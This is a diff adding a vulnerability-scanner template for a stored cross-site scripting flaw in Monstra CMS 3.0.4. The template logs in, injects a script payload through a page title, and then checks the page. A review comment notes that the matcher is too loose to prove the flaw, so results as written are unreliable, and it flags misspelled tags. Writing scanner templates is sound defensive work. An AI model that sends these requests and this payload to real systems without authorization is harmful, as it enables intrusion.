diff --git a/cves/2020/CVE-2020-23697.yaml b/cves/2020/CVE-2020-23697.yaml
new file mode 100644
index 0000000000..36c701cac4
--- /dev/null
+++ b/cves/2020/CVE-2020-23697.yaml
@@ -0,0 +1,62 @@
+id: CVE-2020-23697
+
+info:
+  name: Monstra CMS V3.0.4 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    Cross Site Scripting vulnerabilty in Monstra CMS 3.0.4 via the 'page' feature in admin/index.php.
+  reference:
+    - https://github.com/monstra-cms/monstra/issues/463
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-23697
+  classification:
+    cve-id: CVE-2020-23697
+  metadata:
+    verified: true
+  tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated
+
+variables:
+  string: "{{to_lower('{{randstr}}')}}"
+
+requests:
+  - raw:
+      - |
+        POST /admin/index.php?id=dashboard HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        login={{username}}&password={{password}}&login_submit=Log+In
+
+      - |
+        GET /admin/index.php?id=pages&action=add_page HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+      - |
+        POST /admin/index.php?id=pages&action=add_page HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        csrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15
+
+      - |
+        GET /{{string}} HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(all_headers_4, "text/html")'
+          - 'status_code_4 == 200'
+          - 'contains(body_4, ">") && contains(body_4, "Monstra")'
+        condition: and
+
+    extractors:
+      - type: regex
+        name: csrf
+        part: body
+        group: 1
+        regex:
+          - 'id="csrf" name="csrf" value="(.*)">'
+        internal: true
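Review bot: The dsl matcher on the fourth response does not confirm that the injected title was reflected unescaped: `contains(body_4, ">") && contains(body_4, "Monstra")` is satisfied by essentially any Monstra HTML page, so a successful login against a patched install would still be reported as vulnerable. If a longer marker was lost when this hunk was flattened, disregard; otherwise match the exact string the template itself submits in `page_title`, e.g. `- 'contains(body_4, "<script>alert(document.domain)</script>")'`, so the result proves reflection rather than page existence. The `tags` line also misspells the product (`mostra,mostracms` should read `monstra,monstracms`), which breaks tag-based selection of this template, and the description has `vulnerabilty`. The csrf extractor's greedy `value="(.*)">` may over-capture if other `">` text follows on the same line; `value="(.*?)">` is the safer form.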